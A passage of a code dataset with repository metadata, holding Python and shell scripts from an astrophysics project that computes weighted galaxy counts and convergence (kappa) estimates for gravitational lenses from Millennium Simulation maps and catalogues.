np.c_[data.field('5_lens_gal'),data.field('6_lens_zweight'),data.field('7_lens_mass'),data.field('8_lens_mass2'),data.field('9_lens_mass3'),data.field('10_lens_oneoverr'),data.field('11_lens_zoverr'),data.field('12_lens_massoverr'),data.field('13_lens_mass2overr'),data.field('14_lens_mass3overr'),data.field('15_lens_mass2rms'),data.field('16_lens_mass3rms'),data.field('17_lens_mass2overrms'),data.field('18_lens_mass3overrms'),data.field('19_lens_flexion'),data.field('20_lens_tidal'),data.field('21_lens_convergence'),data.field('22_lens_convergencehalo')].T\n if i == 0:\n q_W1_75read = dataread\n else: q_W1_75read = np.r_['1',q_W1_75read,dataread]\n hdu.close()\n\n print \"W2...\"\n for i in range(len(lstW2_50)):\n hdu = fits.open(root+lstW2_50[i]); data = hdu[1].data\n dataread = np.c_[data.field('5_lens_gal'),data.field('6_lens_zweight'),data.field('7_lens_mass'),data.field('8_lens_mass2'),data.field('9_lens_mass3'),data.field('10_lens_oneoverr'),data.field('11_lens_zoverr'),data.field('12_lens_massoverr'),data.field('13_lens_mass2overr'),data.field('14_lens_mass3overr'),data.field('15_lens_mass2rms'),data.field('16_lens_mass3rms'),data.field('17_lens_mass2overrms'),data.field('18_lens_mass3overrms'),data.field('19_lens_flexion'),data.field('20_lens_tidal'),data.field('21_lens_convergence'),data.field('22_lens_convergencehalo')].T\n if i == 0:\n q_W2_50read = dataread\n else: q_W2_50read = np.r_['1',q_W2_50read,dataread]\n hdu.close()\n #print np.shape(q_W2_50read)\n for i in range(len(lstW2_75)):\n hdu = fits.open(root+lstW2_75[i]); data = hdu[1].data\n dataread = np.c_[data.field('5_lens_gal'),data.field('6_lens_zweight'),data.field('7_lens_mass'),data.field('8_lens_mass2'),data.field('9_lens_mass3'),data.field('10_lens_oneoverr'),data.field('11_lens_zoverr'),data.field('12_lens_massoverr'),data.field('13_lens_mass2overr'),data.field('14_lens_mass3overr'),data.field('15_lens_mass2rms'),data.field('16_lens_mass3rms'),data.field('17_lens_mass2overrms'),data.field('18_lens_mass3overrms'),data.field('19_lens_flexion'),data.field('20_lens_tidal'),data.field('21_lens_convergence'),data.field('22_lens_convergencehalo')].T\n if i == 0:\n q_W2_75read = dataread\n else: q_W2_75read = np.r_['1',q_W2_75read,dataread]\n hdu.close()\n\n print \"W3...\"\n for i in range(len(lstW3_50)):\n hdu = fits.open(root+lstW3_50[i]); data = hdu[1].data\n dataread = np.c_[data.field('5_lens_gal'),data.field('6_lens_zweight'),data.field('7_lens_mass'),data.field('8_lens_mass2'),data.field('9_lens_mass3'),data.field('10_lens_oneoverr'),data.field('11_lens_zoverr'),data.field('12_lens_massoverr'),data.field('13_lens_mass2overr'),data.field('14_lens_mass3overr'),data.field('15_lens_mass2rms'),data.field('16_lens_mass3rms'),data.field('17_lens_mass2overrms'),data.field('18_lens_mass3overrms'),data.field('19_lens_flexion'),data.field('20_lens_tidal'),data.field('21_lens_convergence'),data.field('22_lens_convergencehalo')].T\n if i == 0:\n q_W3_50read = dataread\n else: q_W3_50read = np.r_['1',q_W3_50read,dataread]\n hdu.close()\n #print np.shape(q_W3_50read)\n for i in range(len(lstW3_75)):\n hdu = fits.open(root+lstW3_75[i]); data = hdu[1].data\n dataread = np.c_[data.field('5_lens_gal'),data.field('6_lens_zweight'),data.field('7_lens_mass'),data.field('8_lens_mass2'),data.field('9_lens_mass3'),data.field('10_lens_oneoverr'),data.field('11_lens_zoverr'),data.field('12_lens_massoverr'),data.field('13_lens_mass2overr'),data.field('14_lens_mass3overr'),data.field('15_lens_mass2rms'),data.field('16_lens_mass3rms'),data.field('17_lens_mass2overrms'),data.field('18_lens_mass3overrms'),data.field('19_lens_flexion'),data.field('20_lens_tidal'),data.field('21_lens_convergence'),data.field('22_lens_convergencehalo')].T\n if i == 0:\n q_W3_75read = dataread\n else: q_W3_75read = np.r_['1',q_W3_75read,dataread]\n hdu.close()\n\n print \"W4...\"\n for i in range(len(lstW4_50)):\n hdu = fits.open(root+lstW4_50[i]); data = hdu[1].data\n dataread = np.c_[data.field('5_lens_gal'),data.field('6_lens_zweight'),data.field('7_lens_mass'),data.field('8_lens_mass2'),data.field('9_lens_mass3'),data.field('10_lens_oneoverr'),data.field('11_lens_zoverr'),data.field('12_lens_massoverr'),data.field('13_lens_mass2overr'),data.field('14_lens_mass3overr'),data.field('15_lens_mass2rms'),data.field('16_lens_mass3rms'),data.field('17_lens_mass2overrms'),data.field('18_lens_mass3overrms'),data.field('19_lens_flexion'),data.field('20_lens_tidal'),data.field('21_lens_convergence'),data.field('22_lens_convergencehalo')].T\n if i == 0:\n q_W4_50read = dataread\n else: q_W4_50read = np.r_['1',q_W4_50read,dataread]\n hdu.close()\n #print np.shape(q_W4_50read)\n for i in range(len(lstW4_75)):\n hdu = fits.open(root+lstW4_75[i]); data = hdu[1].data\n dataread = np.c_[data.field('5_lens_gal'),data.field('6_lens_zweight'),data.field('7_lens_mass'),data.field('8_lens_mass2'),data.field('9_lens_mass3'),data.field('10_lens_oneoverr'),data.field('11_lens_zoverr'),data.field('12_lens_massoverr'),data.field('13_lens_mass2overr'),data.field('14_lens_mass3overr'),data.field('15_lens_mass2rms'),data.field('16_lens_mass3rms'),data.field('17_lens_mass2overrms'),data.field('18_lens_mass3overrms'),data.field('19_lens_flexion'),data.field('20_lens_tidal'),data.field('21_lens_convergence'),data.field('22_lens_convergencehalo')].T\n if i == 0:\n q_W4_75read = dataread\n else: q_W4_75read = np.r_['1',q_W4_75read,dataread]\n hdu.close()\n" }, { "alpha_fraction": 0.7345215678215027, "alphanum_fraction": 0.7786116600036621, "avg_line_length": 49.761905670166016, "blob_id": "35217edfec84a04c18fac21032bb36983baba9b0", "content_id": "e1eb65558cd2141cb19977bc964f4c83c433f259", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1066, "license_type": "no_license", "max_line_length": 163, "num_lines": 21, "path": "/python/learn/quickreduce.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#from pyraf import iraf\n#import pyds9\nimport imexam\n#from os import system\n#system(\"/Applications/ds9.darwinsierra.7.5/ds9 &\")\n# if this does not work, consult https://imexam.readthedocs.io/en/latest/imexam/description.html#how-to-install or perhaps do from outside source activate iraf27\nviewer=imexam.connect()\n# viewer=imexam.connect(\"/tmp/xpa/DS9_ds9.1979\") # this myight work if the above does not, where the address is from ds9 > File > XPA > Information... > XPA_METHOD\nviewer.load_fits('/Users/cerusu/Desktop/IRCA00335317.fits')\n# this might work for croscorrelation, especially if I choose image subsection:\nfrom astropy.io import fits\nfrom image_registration import chi2_shift\nfrom image_registration.fft_tools import shift\ndata1 = fits.open('/Users/cerusu/Desktop/IRCA00335317.fits')[0].data\ndata2 = fits.open('/Users/cerusu/Desktop/IRCA00335303.fits')[0].data\nxoff, yoff, exoff, eyoff = chi2_shift(data1, data2, return_error=True, upsample_factor='auto')\n\n#from stellarpop import distances\n#Distance=distances.Distance()\n#Distance.reset\n#Distance.age(1)\n" }, { "alpha_fraction": 0.6685082912445068, "alphanum_fraction": 0.7661141753196716, "avg_line_length": 26.149999618530273, "blob_id": "f389cb0ab58505bfc1984d5cd76d1385709c8da6", "content_id": "bd6bb48c47f8baafe5786c89784a2055b8a53e83", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 543, "license_type": "no_license", "max_line_length": 76, "num_lines": 20, "path": "/python/scripts/NAOJ/batch_infersim18.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n#PBS -r y\n#PBS -m abe\n#PBS -q q1m\n#PBS -o Log18s.out\n#PBS -e Log18s.err\n#PBS -N 18s\n#PBS -l mem=16gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /mfst01a/rusucs/WFI2033/MSwghtratios/\n\npython inferkappasimbias.py WFI2033 5 45 23 meds gal gamma oneoverr SIS\npython inferkappasimbias.py WFI2033 5 120 23 meds gal gamma oneoverr SIS\npython inferkappasimbiasphil.py WFI2033 5 45 23 meds gal gamma oneoverr SIS\npython inferkappasimbiasphil.py WFI2033 5 120 23 meds gal gamma oneoverr SIS\n" }, { "alpha_fraction": 0.7010309100151062, "alphanum_fraction": 0.8247422575950623, "avg_line_length": 96, "blob_id": "d46d93571e8abb0d73072e52e5ac41a7845fb01d", "content_id": "320b77cbc5ddfc799478a1510345cf3b325ba8d3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 776, "license_type": "no_license", "max_line_length": 96, "num_lines": 8, "path": "/python/scripts/NAOJ/script_extractMillennium2.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "python extractMillennium_Henriques.py GGL_los_8_1_0_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_1_1_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_1_2_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_1_3_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_1_4_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_1_5_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_1_6_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_1_7_N_4096_ang_4_Henriques2014_galaxies_on_plane\n" }, { "alpha_fraction": 0.5704867243766785, "alphanum_fraction": 0.6483938097953796, "avg_line_length": 72.781005859375, "blob_id": "b66f5dcf8d4bf8f5a4a40240302e190f97167f5b", "content_id": "ab8a26e320a61877388b91675fd6e939897efdbb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 38071, "license_type": "no_license", "max_line_length": 798, "num_lines": 516, "path": "/python/catalogue_utilities/kappamed_insertstarsnobetasingleband.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# CE Rusu, Feb 12 2018\n# This code uses the Millenium Sumilation convergence and shear maps as well as the associated SA catalogue of galaxies, in order to compute the weighted counts for fields centered around each kappa and gamma point. This is done for a variety of limiting magnitudes, aperture radii, and weights.\n# run with the following arguments: lens name, field name, limiting mag, outer mask radius, type, inner mask radius, zinf, zsup (in case I remove redshift slices); e.g.: python /lfs08/rusucs/code/kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_0_0_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\n# the code can oly be used for limmag 23 or 24 currently\n\nimport numpy as np\nimport scipy\nimport sys\nimport os\nfrom os import system\nfrom scipy import special\nimport pandas as pd\nimport time\n#import distances\nfrom scipy.interpolate import griddata\nimport astropy.table as table\nfrom astropy.io import fits # for tables\n\n############################\n# function definitions\n############################\n\ndef pause():\n programPause = raw_input(\"Press the <ENTER> key to continue...\") # use for debugging\n\ndef readbinary(replacestr):\n replace = plane + replacestr\n os.system(\"sed \\\"11s/.*/ const char kappa_file_name[] = \\\\\\\"\\%s\\\\\\\";/\\\" readKappaBinary.c > readKappaBinary_%s_%s_%s_%s_%s_%sinner.c_\" % (replace,lens,type,plane,float(limmag),radius,innermsk))\n os.system(\"sed \\\"35s/.*/ fpt = fopen (\\\\\\\"kappa_values_%s_%s_%s_%s_%s_%sinner.dat\\\\\\\", \\\\\\\"w\\\\\\\");/\\\" readKappaBinary_%s_%s_%s_%s_%s_%sinner.c_ > readKappaBinary_%s_%s_%s_%s_%s_%sinner.c\" % (lens,type,plane,float(limmag),radius,innermsk,lens,type,plane,float(limmag),radius,innermsk,lens,type,plane,float(limmag),radius,innermsk))\n os.system(\"rm -f readKappaBinary_%s_%s_%s_%s_%s_%sinner.c_\" % (lens,type,plane,float(limmag),radius,innermsk))\n os.system(\"gcc readKappaBinary_%s_%s_%s_%s_%s_%sinner.c -o compiled_%s_%s_%s_%s_%s_%sinner.out\" % (lens,type,plane,float(limmag),radius,innermsk,lens,type,plane,float(limmag),radius,innermsk))\n os.system(\"./compiled_%s_%s_%s_%s_%s_%sinner.out\" % (lens,type,plane,float(limmag),radius,innermsk))\n os.system(\"rm -f readKappaBinary_%s_%s_%s_%s_%s_%sinner.c\" % (lens,type,plane,float(limmag),radius,innermsk))\n os.system(\"rm -f compiled_%s_%s_%s_%s_%s_%sinner.out\" % (lens,type,plane,float(limmag),radius,innermsk))\n\ndef contaminants(count,cont_ugr,posxmin,posxmax,posymin,posymax,star_rmag):\n cont = np.random.random_integers(0,499,int(count * cont_ugr)) # randomly select from the star catalogues which contain 500 stars each\n cont_posx = np.random.uniform(posxmin,posxmax,int(count * cont_ugr))\n cont_posy = np.random.uniform(posymin,posymax,int(count * cont_ugr))\n cont_rmag = star_rmag[cont]\n return cont, cont_posx, cont_posy, cont_rmag\n\ndef weightedcounts(cat,spacing,lim1D,cells_on_a_side,L_field,L_pix,cells,kappagamma,pln,bands):\n initialized = 0\n for i in range(spacing):\n for j in range(spacing):\n print \"(%s,%s)/(%s,%s) for radius %s\" % (i+1,j+1,spacing,spacing,radius)\n grid_x, grid_y = np.mgrid[lim1D + i:4096 - lim1D - (4096 - 2 * lim1D) % spacing - spacing + i:complex(0,cells_on_a_side), lim1D + j:4096 - lim1D - (4096 - 2 * lim1D) % spacing - spacing + j:complex(0,cells_on_a_side)] # the grid containing the kappa pixel at the center of cells\n cellx = grid_x.flatten()\n celly = grid_y.flatten()\n cellxy = np.array([cellx,celly])\n posxy = np.array([-0.5 * L_field + (1 + cellxy[0] + 0.5) * L_pix, -0.5 * L_field + (1 + cellxy[1] + 0.5) * L_pix])\n cellkappagamma = np.c_[cells,kappagamma[:,][(cellxy[0] * 4096 + cellxy[1]).astype(int)]]\n index = griddata(posxy.T, cells, (cat[:,index_posx], cat[:,index_posy]), method='nearest')\n sep = np.sqrt((posxy[0][index.astype(int)]-cat[:,index_posx])**2 + (posxy[1][index.astype(int)]-cat[:,index_posy])**2)*1/degree*3600\n cat_msk = np.c_[cat,index,sep]\n catinner = cat_msk[cat_msk[:,index_sep] <= innermsk] # so that I can count how many objects are inside the inner mask\n cat_msk = cat_msk[cat_msk[:,index_sep] <= radius] # mask objects at distance larger than the aperture from the center\n cat_msk = cat_msk[cat_msk[:,index_sep] > innermsk] # uses the inner mask\n cat_msk[:,index_sep][cat_msk[:,index_sep] < 10] = 10\n #cat = np.c_[z,posx,posy,mstar,rmag...]\n\n w_gal_2X = np.bincount(cat_msk[:,index_index].astype(int)) # 2X stands for 23 or 24 limmag\n galinner = np.bincount(catinner[:,index_index].astype(int)) # counts objects inside the inner mask\n index_all = np.unique(index.astype(int)) # sorts all unique entries; galinner and w_gal_2X may contain fewer elements, because in some indexed cells (it seems largest index only) there may be no galaxies, so I need to expand them to include all indices\n #print len(index_all),len(w_gal_2X),len(galinner)\n try:\n w_gal_2X = np.append(w_gal_2X,np.zeros(len(index_all)-len(w_gal_2X))) # in rare cases, for the 45\" aperture, index will have missing fields (it will miss one of the integers from 0 to len(index)). So this assignment will not work, because np.zeros(len(index_all)-len(w_gal_2X))is a negative number\n galinner = np.append(galinner,np.zeros(len(index_all)-len(galinner)))\n except:\n missing = []\n for k in range(len(index_all)):\n if k not in index_all: missing = np.append(missing,k)\n for k in range(len(missing)):\n insert = np.copy(cat_msk[0]) # any entry would do\n insert[index_index] = missing[k]\n cat_msk = np.append(cat_msk,insert.reshape(1,5),axis = 0)\n index_all = np.append(index_all,missing)\n w_gal_2X = np.append(w_gal_2X,np.zeros(len(index_all)-len(w_gal_2X)))\n galinner = np.append(galinner,np.zeros(len(index_all)-len(galinner)))\n\n try:\n p_oneoverr = pd.DataFrame({'cell':cat_msk[:,index_index].astype(int),'oneoverr':1.0 / cat_msk[:,index_sep]})\n w_oneoverr_2X = p_oneoverr.groupby(['cell']).median().values[:,0] * w_gal_2X # this might fail for radius=45, where there are the larger fluctuations in the number of galaxies, and as I remove galaxies from cat_msk there might be an index for which all cells contain zero galaxies. In that case the index is removed from cat_msk, but _zweight.groupby(['cell']).median().values[:,0] needs all indices to be present. The solution is to insert a ghost line into cat_msk for each missing index\n except:\n #print len(w_gal_2X[w_gal_2X==0])\n missing = np.array([])\n cat_msk_unique = np.unique(cat_msk[:,index_index]).astype(int) # to speed up the search\n for k in range(int(np.max(index_all))):\n if k not in cat_msk_unique:\n missing = np.append(missing,np.array([k]))\n for k in range(len(missing)):\n insert = np.copy(cat_msk[0]) # any entry would do\n insert[index_index] = missing[k]\n cat_msk=np.append(cat_msk,insert.reshape(1,5),axis = 0)\n\n p_oneoverr = pd.DataFrame({'cell':cat_msk[:,index_index].astype(int),'oneoverr':1.0 / cat_msk[:,index_sep]})\n #for k in range(len(missing)):\n #cat_msk = np.delete(cat_msk,-1,axis = 0) # delete the last line I inserted above; actually this is not necessary because cat_msk is no longer used\n w_oneoverr_2X = p_oneoverr.groupby(['cell']).median().values[:,0] * w_gal_2X\n\n cellkappagamma = np.c_[cellkappagamma,w_gal_2X,w_oneoverr_2X,galinner]\n cellkappagammastyle = np.c_[cellkappagamma[:,1].astype(int),np.around(cellkappagamma[:,2],decimals=5),np.around(cellkappagamma[:,3],decimals=5),np.around(cellkappagamma[:,4],decimals=5),cellkappagamma[:,5].astype(int),np.around(cellkappagamma[:,6],decimals=4),cellkappagamma[:,7].astype(int)]\n if initialized != 0:\n \tcellkappagammafinal = np.r_[cellkappagammafinal,cellkappagammastyle]\n else:\n f = '%snobeta%s%smedinject_%s_%s_%s_%s_%s_%sarcsecinner.fits' % (rootwghtratios,pln,type,bands,lens,plane[0:13],limmag,radius,innermsk)\n os.system('rm -f %s' % f)\n cellkappagammafinal = cellkappagammastyle\n initialized = 1\n if (i == spacing - 1) and (j == spacing - 1):\n tableout = table.Table(cellkappagammafinal, names=('ID', 'kappa', 'gamma1', 'gamma2', 'w_gal_%s' % limmag, 'w_oneoverr_%s' % limmag, 'galinner_%s' % limmag), dtype=(np.int32,np.float32,np.float32,np.float32,np.int32,np.float32,np.float32))\n #fits.append(f, tableout.as_array())\n tableout.write(f)\n del tableout\n\n############################\n# lens information\n############################\n\nstart_time = time.time()\n\nlens = str(sys.argv[1])\nplane = str(sys.argv[2])\nlimmag = float(str(sys.argv[3]))\nradiusstr = str(sys.argv[4])\ntype = str(sys.argv[5]) # computed or measured\ninnermsk = int(str(sys.argv[6])) # inner mask in arcsec\n\nif lens == \"PG1115\":\n brightmag = 15.3\n #limmag = 22.5\n pln = 34\n if (radiusstr == \"45\"):\n hstcoverage = 0\n radius = 45\n fracspec20 = 1 # gal+stars\n fracspec21 = 1\n fracspec22 = 0.73\n fracspec23 = 0.15\n fracspec24 = 0.00\n if (radiusstr == \"120\"):\n hstcoverage = 0\n radius = 120\n fracspec20 = 0.69\n fracspec21 = 0.81\n fracspec22 = 0.52\n fracspec23 = 0.07\n fracspec24 = 0.00\n\nrootwghtratios = \"/lfs08/rusucs/%s/MSwghtratios/\" % lens\n#rootwghtratios = \"/u/flashscratch/c/cerusu/MSwghtratios/\"\n#rootwghtratios = \"/mnt/scratch/rusucs/%s/MSwghtratios/\" % lens\n#rootwghtratios = \"/Volumes/LaCieSubaru/MSweights/\"\nrootgals = \"/lfs08/rusucs/%s/MSgals/\" % lens\n#rootgals = \"/u/flashscratch/c/cerusu/MSgals/\"\n#rootgals = \"/mnt/scratch/rusucs/%s/MSgals/\" % lens\n#rootgals = \"/Volumes/LaCieSubaru/MSgals/\"\nrootkappaplanes = \"/lfs08/rusucs/kappaplanes/\"\n#rootkappaplanes = \"/u/flashscratch/c/cerusu/kappaplanes/\"\n#rootkappaplanes = \"/mnt/scratch/rusucs/kappaplanes/\"\n#rootkappaplanes = \"/Volumes/LaCieSubaru/kappaplanes/\"\nrootstars = \"/lfs08/rusucs/insertstars/\"\n#rootstars = \"/u/flashscratch/c/cerusu/insertstars/\"\n#rootstars = \"/Volumes/LaCieSubaru/insertstars/\"\n#rootstars = \"/mnt/scratch/rusucs/insertstars/\"\n\n# contamination and incompleteness based on Figure 9 W1 from Hildebrandt 2012\n\ncont_h12_18 = 0.00\ncont_h12_185 = 0.12\ncont_h12_19 = 0.08\ncont_h12_195 = 0.03\ncont_h12_20 = 0.04\ncont_h12_205 = 0.06\ncont_h12_21 = 0.05\ncont_h12_215 = 0.02\ncont_h12_22 = 0.01\ncont_h12_225 = 0.02\ncont_h12_23 = 0.03\ncont_h12_235 = 0.01\ncont_h12_24 = 0.01\n\ninc_h12_18 = 0.20\ninc_h12_185 = 0.13\ninc_h12_19 = 0.20\ninc_h12_195 = 0.00\ninc_h12_20 = 0.03\ninc_h12_205 = 0.02\ninc_h12_21 = 0.01\ninc_h12_215 = 0.07\ninc_h12_22 = 0.05\ninc_h12_225 = 0.05\ninc_h12_23 = 0.03\ninc_h12_235 = 0.02\ninc_h12_24 = 0.01\n\nnospec_18 = 1 - fracspec20\nnospec_185 = 1 - fracspec20\nnospec_19 = 1 - fracspec20\nnospec_195 = 1 - fracspec20\nnospec_20 = 1 - fracspec20\nnospec_205 = 1 - fracspec21\nnospec_21 = 1 - fracspec21\nnospec_215 = 1 - fracspec22\nnospec_22 = 1 - fracspec22\nnospec_225 = 1 - fracspec23\nnospec_23 = 1 - fracspec23\nnospec_235 = 1 - fracspec24\nnospec_24 = 1 - fracspec24\n\ncont_ugrizJHK_18 = cont_h12_18 * nospec_18 * (1 - hstcoverage)\ncont_ugrizJHK_185 = cont_h12_185 * nospec_185 * (1 - hstcoverage)\ncont_ugrizJHK_19 = cont_h12_19 * nospec_19 * (1 - hstcoverage)\ncont_ugrizJHK_195 = cont_h12_195 * nospec_195 * (1 - hstcoverage)\ncont_ugrizJHK_20 = cont_h12_20 * nospec_20 * (1 - hstcoverage)\ncont_ugrizJHK_205 = cont_h12_205 * nospec_205 * (1 - hstcoverage)\ncont_ugrizJHK_21 = cont_h12_21 * nospec_21 * (1 - hstcoverage)\ncont_ugrizJHK_215 = cont_h12_215 * nospec_215 * (1 - hstcoverage)\ncont_ugrizJHK_22 = cont_h12_22 * nospec_22 * (1 - hstcoverage)\ncont_ugrizJHK_225 = cont_h12_225 * nospec_225 * (1 - hstcoverage)\ncont_ugrizJHK_23 = cont_h12_23 * nospec_23 * (1 - hstcoverage)\ncont_ugrizJHK_235 = cont_h12_235 * nospec_235 * (1 - hstcoverage)\ncont_ugrizJHK_24 = cont_h12_24 * nospec_24 * (1 - hstcoverage)\n\ncont_ugriz_18 = cont_h12_18\ncont_ugriz_185 = cont_h12_185\ncont_ugriz_19 = cont_h12_19\ncont_ugriz_195 = cont_h12_195\ncont_ugriz_20 = cont_h12_20\ncont_ugriz_205 = cont_h12_205\ncont_ugriz_21 = cont_h12_21\ncont_ugriz_215 = cont_h12_215\ncont_ugriz_22 = cont_h12_22\ncont_ugriz_225 = cont_h12_225\ncont_ugriz_23 = cont_h12_23\ncont_ugriz_235 = cont_h12_235\ncont_ugriz_24 = cont_h12_24\n\ninc_ugrizJHK_18 = inc_h12_18 * nospec_18 * (1 - hstcoverage)\ninc_ugrizJHK_185 = inc_h12_185 * nospec_185 * (1 - hstcoverage)\ninc_ugrizJHK_19 = inc_h12_19 * nospec_19 * (1 - hstcoverage)\ninc_ugrizJHK_195 = inc_h12_195 * nospec_195 * (1 - hstcoverage)\ninc_ugrizJHK_20 = inc_h12_20 * nospec_20 * (1 - hstcoverage)\ninc_ugrizJHK_205 = inc_h12_205 * nospec_205 * (1 - hstcoverage)\ninc_ugrizJHK_21 = inc_h12_21 * nospec_21 * (1 - hstcoverage)\ninc_ugrizJHK_215 = inc_h12_215 * nospec_215 * (1 - hstcoverage)\ninc_ugrizJHK_22 = inc_h12_22 * nospec_22 * (1 - hstcoverage)\ninc_ugrizJHK_225 = inc_h12_225 * nospec_225 * (1 - hstcoverage)\ninc_ugrizJHK_23 = inc_h12_23 * nospec_23 * (1 - hstcoverage)\ninc_ugrizJHK_235 = inc_h12_235 * nospec_235 * (1 - hstcoverage)\ninc_ugrizJHK_24 = inc_h12_24 * nospec_24 * (1 - hstcoverage)\n\ninc_ugriz_18 = inc_h12_18\ninc_ugriz_185 = inc_h12_185\ninc_ugriz_19 = inc_h12_19\ninc_ugriz_195 = inc_h12_195\ninc_ugriz_20 = inc_h12_20\ninc_ugriz_205 = inc_h12_205\ninc_ugriz_21 = inc_h12_21\ninc_ugriz_215 = inc_h12_215\ninc_ugriz_22 = inc_h12_22\ninc_ugriz_225 = inc_h12_225\ninc_ugriz_23 = inc_h12_23\ninc_ugriz_235 = inc_h12_235\ninc_ugriz_24 = inc_h12_24\n\n# read the stellar contaminants I will insert\n\n# !!!!!!!!!!! the mags are actually i-band, not r-band, but I will ignore that since I'm not 'estimating' z and Mstar\nstar_rmag_18 = np.loadtxt(\"%sstar018zcut_catpdzmstar_magrepaired.cat\" % rootstars, usecols = [0], unpack=True)\nstar_rmag_185 = np.loadtxt(\"%sstar18185zcut_catpdzmstar_magrepaired.cat\" % rootstars, usecols = [0], unpack=True)\nstar_rmag_19 = np.loadtxt(\"%sstar18519zcut_catpdzmstar_magrepaired.cat\" % rootstars, usecols = [0], unpack=True)\nstar_rmag_195 = np.loadtxt(\"%sstar19195zcut_catpdzmstar_magrepaired.cat\" % rootstars, usecols = [0], unpack=True)\nstar_rmag_20 = np.loadtxt(\"%sstar19520zcut_catpdzmstar_magrepaired.cat\" % rootstars, usecols = [0], unpack=True)\nstar_rmag_205 = np.loadtxt(\"%sstar20205zcut_catpdzmstar_magrepaired.cat\" % rootstars, usecols = [0], unpack=True)\nstar_rmag_21 = np.loadtxt(\"%sstar20521zcut_catpdzmstar_magrepaired.cat\" % rootstars, usecols = [0], unpack=True)\nstar_rmag_215 = np.loadtxt(\"%sstar21215zcut_catpdzmstar_magrepaired.cat\" % rootstars, usecols = [0], unpack=True)\nstar_rmag_22 = np.loadtxt(\"%sstar21522zcut_catpdzmstar_magrepaired.cat\" % rootstars, usecols = [0], unpack=True)\nstar_rmag_225 = np.loadtxt(\"%sstar22225zcut_catpdzmstar_magrepaired.cat\" % rootstars, usecols = [0], unpack=True)\nstar_rmag_23 = np.loadtxt(\"%sstar22523zcut_catpdzmstar_magrepaired.cat\" % rootstars, usecols = [0], unpack=True)\nstar_rmag_235 = np.loadtxt(\"%sstar23235zcut_catpdzmstar_magrepaired.cat\" % rootstars, usecols = [0], unpack=True)\nstar_rmag_24 = np.loadtxt(\"%sstar23524zcut_catpdzmstar_magrepaired.cat\" % rootstars, usecols = [0], unpack=True)\n\n############################\n# read the binary kappa file\n############################\n\nstart_readkappa = time.time()\n\nif str(pln) in plane:\n os.chdir(rootkappaplanes)\n readbinary(\".kappa\")\n pos1D,kappa = np.loadtxt(\"kappa_values_%s_%s_%s_%s_%s_%sinner.dat\" % (lens,type,plane,float(limmag),radius,innermsk), unpack=True)\n readbinary(\".gamma_1\")\n gamma1 = np.loadtxt(\"kappa_values_%s_%s_%s_%s_%s_%sinner.dat\" % (lens,type,plane,float(limmag),radius,innermsk), usecols = [1], unpack=True)\n readbinary(\".gamma_2\")\n gamma2 = np.loadtxt(\"kappa_values_%s_%s_%s_%s_%s_%sinner.dat\" % (lens,type,plane,float(limmag),radius,innermsk), usecols = [1], unpack=True)\n kappagamma = np.c_[pos1D,kappa,gamma1,gamma2]\n os.system(\"rm -f kappa_values_%s_%s_%s_%s_%s_%sinner.dat\" % (lens,type,plane,float(limmag),radius,innermsk))\nelse: sys.exit('Wrong MS plane for this lens!!!')\n\n############################\n# prepare the galaxy catalogues\n############################\n\nstart_readcat = time.time()\n\nposx_ugrizJHK = np.array([])\nposy_ugrizJHK = np.array([])\nrmag_ugrizJHK = np.array([])\n\nposx_ugriz = np.array([])\nposy_ugriz = np.array([])\nrmag_ugriz = np.array([])\n\nroot = plane[0:13]\n\nfor i in range(4):\n for j in range(4):\n file_ugrizJHK = '%s%s_%d_%d_N_4096_ang_4_SA_galaxies_on_plane_27_to_63_sampledr.images.txt' % (rootgals,root,i,j)\n file_ugriz = '%s%s_%d_%d_N_4096_ang_4_SA_galaxies_on_plane_27_to_63_originalr.images.txt' % (rootgals,root,i,j)\n if \"measured\" in type:\n posx__ugrizJHK, posy__ugrizJHK, rmag__ugrizJHK = np.loadtxt(file_ugrizJHK, usecols = (2,3,4), unpack=True)\n posx__ugriz, posy__ugriz, rmag__ugriz = np.loadtxt(file_ugriz, usecols = (2,3,4), unpack=True)\n elif \"computed\" in type:\n posx__ugrizJHK, posy__ugrizJHK, rmag__ugrizJHK = np.loadtxt(file_ugriz, usecols = (2,3,4), unpack=True)\n posx__ugriz, posy__ugriz, rmag__ugriz = np.loadtxt(file_ugriz, usecols = (2,3,4), unpack=True)\n else: sys.exit('Only \\\"measured\\\" and \\\"computed\\\" are accepted as the fourth argument of the code. Execution stopped.')\n\n if \"measured\" in type:\n # count the galaxies in order to implement the fraction of stars\n count18 = posx__ugrizJHK[(rmag__ugrizJHK > brightmag) & (rmag__ugrizJHK <= 18)].size\n count185 = posx__ugrizJHK[(rmag__ugrizJHK > 18) & (rmag__ugrizJHK <= 18.5)].size\n count19 = posx__ugrizJHK[(rmag__ugrizJHK > 18.5) & (rmag__ugrizJHK <= 19)].size\n count195 = posx__ugrizJHK[(rmag__ugrizJHK > 19) & (rmag__ugrizJHK <= 19.5)].size\n count20 = posx__ugrizJHK[(rmag__ugrizJHK > 19.5) & (rmag__ugrizJHK <= 20)].size\n count205 = posx__ugrizJHK[(rmag__ugrizJHK > 20) & (rmag__ugrizJHK <= 20.5)].size\n count21 = posx__ugrizJHK[(rmag__ugrizJHK > 20.5) & 